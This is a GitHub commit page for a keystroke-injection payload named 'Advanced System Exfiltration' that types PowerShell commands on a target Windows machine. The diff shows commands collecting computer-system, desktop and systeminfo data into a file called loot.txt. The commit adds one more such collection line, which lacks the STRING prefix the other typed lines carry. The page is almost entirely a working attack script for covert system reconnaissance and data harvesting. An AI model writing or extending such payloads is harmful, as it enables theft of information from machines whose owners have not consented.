Skip to content

Commit

Permalink
Update A.S.E - Advanced_System_Exfiltration v. 3.0
Browse files Browse the repository at this point in the history
  • Loading branch information
LulzAnarchyAnon authored Jun 19, 2024
1 parent b768c67 commit 1e70303
Showing 1 changed file with 4 additions and 0 deletions.
4 changes: 4 additions & 0 deletions A.S.E - Advanced_System_Exfiltration v. 3.0
Original file line number Diff line number Diff line change
Expand Up @@ -26,6 +26,10 @@ STRING Get-CimInstance -ClassName Win32_ComputerSystem | Out-File C:\Users\Publi
DELAY 2000
ENTER
DELAY 2000
Get-CimInstance -ClassName Win32_Desktop | Out-File C:\Users\Public\loot.txt -Force -append
DELAY 2000
ENTER
DELAY 2000
STRING systeminfo | Out-File C:\Users\Public\loot.txt -Force -append
DELAY 2000
ENTER
Expand Down

0 comments on commit 1e70303

Please sign in to comment.